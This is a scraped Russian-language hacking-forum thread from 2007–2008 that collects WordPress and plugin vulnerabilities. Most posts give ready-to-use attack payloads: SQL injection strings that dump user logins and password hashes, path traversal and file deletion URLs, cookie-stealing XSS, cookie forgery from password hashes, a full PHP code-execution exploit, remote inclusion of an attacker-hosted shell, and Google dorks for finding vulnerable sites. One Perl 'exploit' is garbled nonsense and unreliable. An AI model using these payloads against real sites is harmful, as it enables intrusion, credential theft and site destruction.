[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    466
    Likes Received:
    841
    Reputations:
    69
    Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability

    Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability

    Файловый менеджер находится тут:

    Code:
    http://[TARGEt]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php
    После загрузки скрипт вы найдете в этом каталоге:

    Code:
    http://[TARGEt]/[path_wordpress]/uploaded/[evil].(php)
    Запрос для поиска:

    Code:
    plugins/wp-filemanager/ 
    inurl:/wp-filemanager/
     
    3 people like this.
  2. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    Code:
    /wp-admin/index.php?page=\..\..\file.php
    /wp-admin/index.php?page=\..\..\.htaccess
    /wp-admin/link-manager.php?page=\..\..\.htaccess
    /wp-admin/link-add.php?page=\..\..\.htaccess
    /wp-admin/link-categories.php?page=\..\..\.htaccess
    /wp-admin/link-import.php?page=\..\..\.htaccess
    /wp-admin/theme-editor.php?page=\..\..\.htaccess
    /wp-admin/plugin-editor.php?page=\..\..\.htaccess
    /wp-admin/profile.php?page=\..\..\.htaccess
    /wp-admin/users.php?page=\..\..\.htaccess
    /wp-admin/options-general.php?page=\..\..\.htaccess
    /wp-admin/options-writing.php?page=\..\..\.htaccess
    /wp-admin/options-reading.php?page=\..\..\.htaccess
    /wp-admin/options-discussion.php?page=\..\..\.htaccess
    /wp-admin/options-permalink.php?page=\..\..\.htaccess
    /wp-admin/options-misc.php?page=\..\..\.htaccess
    /wp-admin/import.php?page=\..\..\.htaccess
    /wp-admin/admin.php?page=\..\..\.htaccess
    /wp-admin/bookmarklet.php?page=\..\..\.htaccess
    /wp-admin/cat-js.php?page=\..\..\.htaccess
    /wp-admin/inline-uploading.php?page=\..\..\.htaccess
    /wp-admin/options.php?page=\..\..\.htaccess
    /wp-admin/profile-update.php?page=\..\..\.htaccess
    /wp-admin/sidebar.php?page=\..\..\.htaccess
    /wp-admin/user-edit.php?page=\..\..\.htaccess
    win only
     
    _________________________
    #22 ettee, 7 Jan 2008
    Last edited: 7 Jan 2008
    1 person likes this.
  3. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    WordPress <=2.3.1 Cookies Manipulation - Вход по md5() хешу пароля в куках

    Вход по md5() хешу пароля в куках

    Программа: WordPress 2.3.1 и более ранние версии
    Опасность: Низкая
    Наличие эксплоита: Нет
    Описание:
    Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности.

    Уязвимость существует из-за того, что злоумышленник может создать два аутентификационных файла куки ("wordpressuser_*" и "wordpresspass_*") из данных в таблице "users" и получить административный доступ к приложения. Для успешной эксплуатации уязвимости злоумышленнику требуется получить доступ на чтение таблицы "users" в базе данных.

    описание и сайт
    http://www.cl.cam.ac.uk/~sjm217/advisories/wordpress-cookie-auth.txt

    ==================================

    PHP:
    $siteurl;$host;
    'wordpressuser_'.md5($siteurl).'='.$login
    'wordpresspass_'.md5($siteurl).'='.md5(md5($pass)) 
    Здесь $siteurl - переменная которая лежит в БД:
    wp_options
    -siteurl

    Тоесть при SQL-инъекции желательно вытащить и ее тоже: (select siteurl from wp_options)

    Иногда один вордпресс используется для разных доменных имен.
    Тогда вместо $siteurl берется $host, фактически равное URL-пути до блога, например:
    http://wordpress.com/blog
    без слеша на конце.



    NEW! Дополнение.

    Раскрытие COOKIEHASH.

    Необязательно вообще добывать siteurl, кодировать его в мд5 и проверять.

    Достаточно послать пост-пакет на wp-pass.php или на wp-login.php
    В ответе вам вернется валидный COOKIEHASH кукиса.

    [-1-] /wp-login.php?action=logout

    [-2-] wp-pass.php

    Code:
    POST /wordpress/wp-pass.php HTTP/1.0
    Host: localhost
    Content-Length: 20
    
    post_password=test
    
     
    _________________________
    #23 halkfild, 14 Jan 2008
    Last edited by a moderator: 13 Jun 2008
    3 people like this.
  4. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    Files locations
    Code:
    blogscout
    lectblog
    blogs
    blog
    blog-*
    blog*
    myblog
    bloggt
    blo
    *-blog
    wp
    wordpress
    wordpress.1
    wordpress-1
    wordpress_1
    wordpress-*
    wordpress_*
    weblog
    webblog
    webblogs
    web-blog
    my-journals
    myjournal
    my-favorite-blog
    myblog
    myblogs
    my-blogs
    wp1-5
    wp2.2
    wp2-2
    wp2.3
    wp2-3
    wp2.2
    wp2.0
    powered-by-wordpress
    wordpress-mu
    wordpress_1_5
    wordpress-1.5
    wordpress-1-5-1
    wordpress-1.5.2	
    wordpress-1.0.2
    wordpress-1-2-2
    wordpress_2.0_only
    wordpress_2.3-series
    wordpress_2.3.2
    wordpress_2-3-1
    Wordpress_2.4
    Wordpress_2.5
    Wordpress_2-5
    wordpress_2.3.1
    wordpress_2.0.2
    wordpress_2.3
    wordpress_2.0.7
    Wordpress_2.4
    wordpress_2.2.3
    wordpress_2.1.2
    WordPress_2.4
    wordpress_2.3.1
    WordPress_2-3
    WordPress_2-2-2	
    WordPress_2-3-3
    wordpress_2-3
    Wordpress_2-2
     
    _________________________
    1 person likes this.
  5. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,699
    Likes Received:
    1,028
    Reputations:
    1,228
    Democracy 2.0.1 HTML Injection Vulnerability

    Code:
    http://wordpress.dom/blah’style=xss:expression(alert(document.cookie)); (Tested on IE7)
    OR
    http://wordpress.dom/blah’onMouseOver=javascript:alert(document.cookie);// (Testing on Firebox & IE)
    fix
    PHP:
    Vulnerable codein class.php (Line 166)
    $url htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’‘dem_poll_id’ => $this->id)));

    Change to:
    $url htmlspecialchars(add_query_arg(array(’dem_action’ => ‘view’‘dem_poll_id’ => $this->id)), ENT_QUOTES); 
     
    _________________________
    2 people like this.
  6. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,699
    Likes Received:
    1,028
    Reputations:
    1,228
    WP TextLinkAds Plugin SQL Injection Vulnerability

    Code:
    http://wordpress-blog/?textlinkads_action=sync_posts&textlinkads_post_id=’/**/U/**/S/**/1,user_login,user_pass,display_name/**/from/**/wp_users%23
    fix
    PHP:
    The vulnerable code is found on line 512:
    $postId $postId;
    This variable is passed to $wpdb->get_results without being sanitised.
    to fix this holesimply change the above line to:
    $postId = (int) $postId;
     
    _________________________
    2 people like this.
  7. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    655
    Likes Received:
    520
    Reputations:
    19
    WordPress<=2.0.3 Arbitrary file deletion

    Только на Windows:

    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
    \.htaccess
    Это также может быть использовано для проведения DoS-атаки. При удалении index.php сайт перестанет нормально функционировать.

    WordPress<=2.0.3 DoS:


    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php
    Только на Windows:
    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..
    \index.php
    XSS:

    HTML:
    http://site/wp-admin/edit.php?page=wp-db-backup.
    php&backup=%3Cscript%3Ealert(document.
    cookie)%3C/script%3E 

    XSS: wp-cat2tag converter:
    HTML:
    http://localhost/wp/wp-admin/admin.php?import=wp-cat2tag&--><script>alert(/XSS/)</script>
    Уязвимы версии WordPress <= 2.0.11 и потенциально последующие версии (2.1.x, 2.2.x и 2.3.x).
     
    #27 iddqd, 19 Jan 2008
    Last edited by a moderator: 24 Jan 2008
    1 person likes this.
  8. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    466
    Likes Received:
    841
    Reputations:
    69
    Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability

    Wordpress plugin WP-Forum 1.7.4 Remote SQL Injection Vulnerability

    Code:
                 remote sql injection exploit
    ###############################################################
                       
    
    # >>> -::DESCRIPTION== >> WordPress forum plugin by Fredrik Fahlstad. Version: 1.7.4.
    
    # >>> exploit: 1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_users where id=1/*      
    
    (wp_tbv_users)
    
    # >>> google: Fredrik Fahlstad. Version: 1.7.4.
    
    # >>> author  websec Team  ./members =====>  Virus_C, Refresh , Virusa
    
    # >>> page : hacking.ge
    
    ###############################################################
    
    this is example
    
    http://www.xxx.com/?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*
    
    # milw0rm.com [2008-01-19]
     
    #28 Solide Snake, 20 Jan 2008
    Last edited by a moderator: 24 Jan 2008
    4 people like this.
  9. _-Ramos-_

    _-Ramos-_ Banned

    Joined:
    4 Jan 2007
    Messages:
    178
    Likes Received:
    214
    Reputations:
    8
    XSS in plugin wp-slimstat 0.92 para Wordpress

    PoC directamente:
    Code:
    http://wordpress-web-blog.com/wp-admin/index.php?page=wp-sl
    imstat/wp-slimstat.php?panel=1&fi=/feed/&ff=1&ft=[xss]
    PoC En Perl:
    Code:
    # Wordpress 2.3 0day exploit – http://xssworm.com
    #
    # A bug exist in wordpress 2.3 that allow hacker to
    # steal blog cookie from wordpress blogmin.
    #
    # To exploit scripting bug the attacker make link
    # to URL of slimstat with XSS shellcode and force
    # blog admin to hit link by embedding into fish
    # email or making blogmin follow interesting links.
    # Also hacker can embed into refer or trackback
    # to inject scripting into wordpress dashboard or
    # make blogmin visit malicious resource when viewing
    # he’s blog.
    #
    #
    # Status: not patched published 0day vulnerability
    # Vendor: wordpress.org
    # Credit: http://xssworm.com
    # Discovery: 1st November 2007
    # Exploit developer: Fracesco Vaj (vaj@xssworm.com)
    #
    # Instruction:
    # To execute exploit for wordpress you will need perl or linux
    #
    # Usage:
    #
    # Execute with perl or linux as:
    # perl wordpress-2.3-0day-xss-injection-bug.pl
    #
    # Hacker will get prompts for target information.
    # Please do not use for irresponsible hacking or to make money.
    # Disclaimer: XSSWORM.COM is not responsible.
    #
    #
     
    #use Net::DNS:Simple;
    #use Math;
    use Socket;
     
    print "Welcome. What is target email address of wordpress blog admin : \n";
    my $target = <stdin>;
    print "ok target is $target\n";
    sleep(3);
    print "ok What is address of wordpress blog : \n";
    sleep(5); my $address = <stdin>;
    print "ok target is $target\n";
    sleep(6);
    # print "testing"
    print "ok using /wp-admin/?page=wp-slimstat/wp-slimstat.php?panel=1&amp;ft=SHELLCODE\n";
    print "\n\n — CUT OUTPUT HERE — \n\n";
    print "HELO xssworm.com\n";
    print "RSET\n";
    PRINT "MAIL FROM: <xssworm@hotmail.com>\n";
    print "RCPT TO: &lt;$target&gt;\n";
    print "DATA\n”; print “Free x pciture and movies at $address\n";
    print "\r\n.\r\nquit\r\n";
    print "\n\n — END OF OUTPUT CUT HERE –\n";
    print "";
    print "Ok now you neeed to cut the exploit above and paste it to:\n";
    print "$address : 25 \n";
    print "Shellcode by vaj@xssworm.com c. 2007\n";
    print "End of attack.\n";
    print "";
    #print "Debug mode on"
    #print "XSS initialized"
    #payload
    sleep(1); return(0);
    # snips</xssworm@hotmail.com></stdin></stdin>
     
    3 people like this.
  10. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,035
    Reputations:
    1,065
    Full path disclosure:
    Code:
    /wp-admin/theme-editor.php?page=
    /wp-admin/plugins.php?page=
    /wp-admin/plugin-editor.php?page=
    /wp-admin/profile.php?page=
    /wp-admin/users.php?page=
    /wp-admin/options-general.php?page=
    /wp-admin/cat-js.php?page=
    /wp-admin/inline-uploading.php?page=
    /wp-admin/options.php?page=
    /wp-admin/profile-update.php?page=
    /wp-admin/sidebar.php?page=
    /wp-admin/user-edit.php?page=
    /wp-admin/admin.php?page=
    /wp-admin/admin-footer.php
    /wp-admin/admin-functions.php
    /wp-admin/edit-form.php
    /wp-admin/edit-form-advanced.php
    /wp-admin/edit-form-comment.php
    /wp-admin/edit-link-form.php
    /wp-admin/index.php?page=
    /wp-admin/link-manager.php?page=
    /wp-admin/link-add.php?page=
    /wp-admin/link-categories.php?page=
    /wp-admin/link-import.php?page=
    /wp-admin/edit-page-form.php
    /wp-admin/menu.php
    /wp-admin/menu-header.php
    /wp-admin/import/blogger.php
    /wp-admin/import/dotclear.php
    /wp-admin/import/greymatter.php
    /wp-admin/import/livejournal.php
    /wp-admin/options-writing.php?page=
    /wp-admin/options-reading.php?page=
    /wp-admin/options-discussion.php?page=
    /wp-admin/options-permalink.php?page=
    /wp-admin/options-misc.php?page=
    /wp-admin/import.php?page=
    /wp-admin/import/mt.php
    /wp-admin/import/rss.php
    /wp-admin/import/textpattern.php
    /wp-admin/bookmarklet.php?page=
     
    _________________________
  11. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    946
    Likes Received:
    427
    Reputations:
    508

    =====================

    Изменения в версиях для общего ознакомления:

    _http://trac.wordpress.org/changeset?old_path=tags%2F2.3.1&old=6528&new_path=tags%2F2.3.2&new=6528

    _http://trac.wordpress.org/query?component=Security&milestone=2.3.2&order=priority

    =====================

    Описание: Перебор логина/пароля в обход логирования.

    Возможность определение логина, перебора пароля через куки(wp-login.php), базик-авторизацию(wp-app.php).

    PHP:
    function wp_login()

    __('<strong>ERROR</strong>: Invalid username.');
    __('<strong>ERROR</strong>: Incorrect password.');
    ========================

    Описание: Раскрытие COOKIEHASH.

    Иногда бывают траблы с формированием куков для эксплоита.
    Обычно это происходит, если блог работает на несколько доменов/субдоменов сразу.
    "siteurl" добытый из базы не подходит.
    В хидере нас вернется пустой кукис с префиксом.

    /wp-login.php?action=logout

    /wp-pass.php

    =====================

    Описание: Права админа: Запись в wp-config.php

    Отстутствие проверки имени файла при записи.

    Читать в wp-config.php нельзя. Но при записи забыли поставить проверку.

    Можно указать свой удаленный сервер и поадминить блог через свою бд.


    Читать нельзя:
    /wp-admin/templates.php?file=wp-config.php

    Но можно писать:
    /wp-admin/templates.php
    POST: newcontent=<?php;phpinfo();?>&action=update&file=wp-config.php

    =====================

    Описание: Passive XSS $_POST['pages-sortby']

    Права: админ

    Примеры уязвимого кода:

    /wp-admin/widgets.php

    PHP:
    function wp_widget_pages_control() {

            $sortby = stripslashes( $_POST['pages-sortby'] );

                        <option value="post_title"<?php selected$options['sortby'], 'post_title' ); ?>><?php _e('Page title'); ?></option>
                        <option value="menu_order"<?php selected$options['sortby'], 'menu_order' ); ?>><?php _e('Page order'); ?></option>
                        <option value="ID"<?php selected$options['sortby'], 'ID' ); ?>><?php _e'Page ID' ); ?></option>
    =====================

    Описание: Хранение пароля и логина админа к мылу в открытом виде в бд, отображение в админке.

    /wp-admin/options-writing.php

    wp_options
    -mailserver_login
    -mailserver_pass

    =====================

    Описание: При импорте блога, если присутствуют посты без автора(анонимы), создается юзверь с дефолтными настройками.

    Тоесть возможно существование учеток с дефолтным паролем "password".

    Примеры уязвимого кода:

    /wp-admin/import/greymatter.php

    PHP:
                    $user_id username_exists($post_author);
                    if (!
    $user_id) {    // if deleted from GM, we register the author as a level 0 user
                        
    $user_ip="127.0.0.1";
                        
    $user_domain="localhost";
                        
    $user_browser="server";
                        
    $user_joindate="1979-06-06 00:41:00";
                        
    $user_login=$wpdb->escape($post_author);
                        
    $pass1=$wpdb->escape("password");
                        
    $user_nickname=$wpdb->escape($post_author);
                        
    $user_email=$wpdb->escape("user@deleted.com");
                        
    $user_url=$wpdb->escape("");
                        
    $user_joindate=$wpdb->escape($user_joindate);

                        
    $user_info = array("user_login"=>$user_login"user_pass"=>$pass1"user_nickname"=>$user_nickname"user_email"=>$user_email"user_url"=>$user_url"user_ip"=>$user_ip"user_domain"=>$user_domain"user_browser"=>$user_browser"dateYMDhour"=>$user_joindate"user_level"=>0"user_idmode"=>"nickname");
                        
    $user_id wp_insert_user($user_info);
                        
    $this->gmnames[$postinfo[1]] = $user_id;

    =====================
     
    #31 Elekt, 24 Jan 2008
    Last edited: 28 Jan 2008
  12. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    # Author : Houssamix From H-T Team
    # Script : Wordpress Plugin fGallery 2.4.1
    # Download : http://www.fahlstad.se/wp-plugins/fgallery/
    # BUG : Remote SQL Injection Vulnerability
    # Dork : inurl:/wp-content/plugins/fgallery/

    ## Vulnerable CODE :
    ~~~~~~~ /wp-content/plugins/fgallery/fim_rss.php ~~~~~~~~~~~~~

    PHP:
    $cat $wpdb->get_row("SELECT * FROM $cats WHERE id = $_GET[album]");
    $images $wpdb->get_results("SELECT * FROM $imgs WHERE cat = $_GET[album] AND status = 'include'");
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    # Exploit :
    [Target.il]/[wordpress_path]//wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--

    Example

    # Script : Wordpress Plugin WP-Cal
    # Download : http://www.fahlstad.se/wp-plugins/wp-cal/
    # BUG : Remote SQL Injection Vulnerability
    # Dorks : inurl:/wp-content/plugins/wp-cal/
    inurl:/WP-Cal/

    ## Vulnerable CODE :
    ~~~~~~~ /wp-content/plugins/wp-cal/functions/editevent.php ~~~~~~~~~~~~~
    PHP:
    $id $_GET['id'];
        
    $event $wpdb->get_row("SELECT * FROM $table WHERE id = $id");
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    # Exploit :
    /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--

    example :
     
    _________________________
    3 people like this.
  13. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    466
    Likes Received:
    841
    Reputations:
    69
    Wordpress Plugin wp-adserve (adclick.php) SQL Injection

    SQL Injection:

    Code:
    http://www.site.com/wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x7c,user_login,0x7c,user_pass,0x7c)%20from%20wp_users
    Для поиска вводим:

    Code:
    allinurl: "wp-adserve"

    Wordpress Plugin WassUp 1.4.1 Remote SQL Injection

    SQL Injection:

    Code:
    http://www.site.com/wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%200,1,2,concat(0x7c,user_login,0x7c,user_pass,0x7c),3,4,0x7c,6,0x7c,8,9,10%20%20from%20wp_users
    Для поиска вводим:

    Code:
    allinurl: "plugins/wassup"
    (c)
     
    3 people like this.
  14. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    655
    Likes Received:
    520
    Reputations:
    19
    Wordpress Plugin dmsguestbook 1.7.0 Multiple Remote Vulnerabilities

    PoC:

    http://milw0rm.com/exploits/5035

    Wordpress Plugin Wordspew Remote SQL Injection Vulnerability

    PoC:

    http://milw0rm.com/exploits/5039
     
  15. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    655
    Likes Received:
    520
    Reputations:
    19
    Wordpress Pluging wp-footnotes 2.2

    Multiple XSS

    Code:
    http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot
    notes_current_settings[priority]="><script>alert("XSS"
    )</script> 
    
    http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_foot
    notes_current_settings[style_rules]=</textarea><script>alert("
    XSS")</script> 
    
    http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current
    _settings[pre_footnotes]=</textarea><script>alert("XSS"
    )</script> 
    
    http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current
    _settings[post_footnotes]=</textarea><script>alert(":-
    (")
    
     
  16. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    466
    Likes Received:
    841
    Reputations:
    69
    Wordpress Plugin st_newsletter Remote SQL Injection

    SQL Injection

    Code:
    wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
    Для поиска:

    Code:
    allinurl :"wp-content/plugins/st_newsletter"
    allinurl :"shiftthis-preview.php"
    (c)
     
    3 people like this.
  17. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    655
    Likes Received:
    520
    Reputations:
    19
    Wordpress MU < 1.3.2 active_plugins option Code Execution

    Exploit:

    PHP:
    <?php
    /*
    WordPress [MU] blog's options overwrite

    Credits : Alexander Concha <alex at buayacorp dot com>
    Website : http://www.buayacorp.com/
    Advisory: http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html

    This exploit uses active_plugins option to execute arbitrary PHP
    */
    include_once './class-snoopy.php';

    // Fix Snoopy
    class SnoopyExt extends Snoopy {
        function 
    _prepare_post_body($formvars$formfiles) {
            if ( 
    is_string($formvars) ) {
                return 
    $formvars;
            }
            return 
    parent::_prepare_post_body($formvars$formfiles);
        }
    }

    set_time_limit);

    // Any user with 'manage_options' and 'upload_files' capabilities
    $user 'user';
    $pass '1234';
    $blog_url 'http://localhost.localdomain/mu/';
    $remote_file ''// relative path to wp-content
    $local_file ''// the contents of this file, if any, will be uploaded

    $snoopy = new SnoopyExt();

    $snoopy->maxredirs 0;
    $snoopy->cookies['wordpress_test_cookie'] = 'WP+Cookie+check';
    $snoopy->submit("{$blog_url}wp-login.php", array('log' => $user'pwd' => $pass));

    $snoopy->setcookies(); // Set auth cookies for future requests

    if ( empty($remote_file) ) {
        
    // Upload a new file
        
    $snoopy->_submit_type 'image/gif';
        
    $snoopy->submit("{$blog_url}wp-app.php?action=/attachments"get_contents());

        if ( 
    preg_match('#<id>([^<]+)</id>#i'$snoopy->results$match) ) {
            
    $remote_file basename($match[1]);
        }
    }
    if ( empty(
    $remote_file) ) die('Exploit failed...');

    // Look for real path
    $snoopy->fetch("{$blog_url}wp-admin/export.php?download");

    if ( 
    preg_match("#<wp:meta_value>(.*$remote_file)</wp:meta_value>#"$snoopy->results$match) ) {
        
    $remote_file preg_replace('#.*?wp-content#'''$match[1]);
    }
    if ( empty(
    $remote_file) ) die('Exploit failed...');

    // It asumes that file uploads are stored within wp-content 
    $remote_file '../' ltrim($remote_file'/');

    $snoopy->fetch("{$blog_url}wp-admin/plugins.php");

    // Recover previous active plugins
    $active_plugins = array();
    if ( 
    preg_match_all('#action=deactivate&([^\']+)#'$snoopy->results$matches) ) {
        foreach (
    $matches[0] as $plugin) {
            if ( 
    preg_match('#plugin=([^&]+)#'$plugin$match) )
                
    $active_plugins[] = urldecode($match[1]);
        }
        
    print_r($active_plugins);
    }
    $active_plugins[] = $remote_file;

    // Fetch a valid nonce
    $snoopy->fetch("{$blog_url}wp-admin/options-general.php");

    if ( 
    preg_match('#name=._wpnonce. value=.([a-z\d]{10}).#'$snoopy->results$match) ) {

        
    // Finally update active_plugins
        
    $snoopy->set_submit_normal();
        
    $snoopy->submit("{$blog_url}wp-admin/options.php",
            array(
                
    'active_plugins' => $active_plugins,
                
    '_wpnonce' => $match[1],
                
    'action' => 'update',
                
    'page_options' => 'active_plugins',
            ));
    }

    function 
    get_contents() {
        global 
    $local_file;

        return 
    file_exists($local_file) ? file_get_contents($local_file) : '<?php echo "Hello World " . __FILE__; ?>';
    }
    ?>

    # milw0rm.com [2008-02-05]
     
    1 person likes this.
  18. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability

    example

    Code:
    http://xxxxx/forums?forum=xxxx&topic= (expliot)

    EXPLOİT 1 :


    Code:
    -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
    [COLOR=Red][B]
    
    EXPLOİT 2 :[/B][/COLOR]

    Code:
    SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)

    example


    Code:
    www.xxxxx/forums?forum=1(expliot)
    &topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
    Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability

    example :

    Code:
    http://www.xxx.com/sf-forum?forum=[exploit]
    EXPLOIT 1 :

    Code:
    -99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
    exploit 2 :

    Code:
    -99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
    (с)milw0rm.com
     
    #38 FraiDex, 15 Feb 2008
    Last edited: 15 Feb 2008
    1 person likes this.
  19. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    461
    Likes Received:
    247
    Reputations:
    88
    Wordpress Photo album Remote SQL Injection Vulnerability

    EXAMPLE
    Сплоит
    зы
    Auth S@BUN http://milw0rm.com/exploits/5135
     
    1 person likes this.
  20. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    655
    Likes Received:
    520
    Reputations:
    19
    Wordpress Plugin Sniplets 1.1.2 Multiple Vulnerabilities

    RFI

    Register Globals: ON

    PoC:

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.
    php?libpath=http://attacker.tld/shell.txt?
    
    XSS

    Register Globals: ON

    PoC:

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/warning.php
    ?text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/notice.php?
    text=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/sniplets/inset.php?t
    ext=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E 
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/submenu.php?ur
    l=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/scrip
    t%3E 
    http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=
    %3Cli%3E
    
    Register Globals: Off

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/view/admin/pager.php?page
    =%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script
    %3E
    
    Remote Code Execution

    Register Globals: ON

    PoC:

    Code:
    http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=
    %3C?php%20system(%22ls%22);
     
Loading...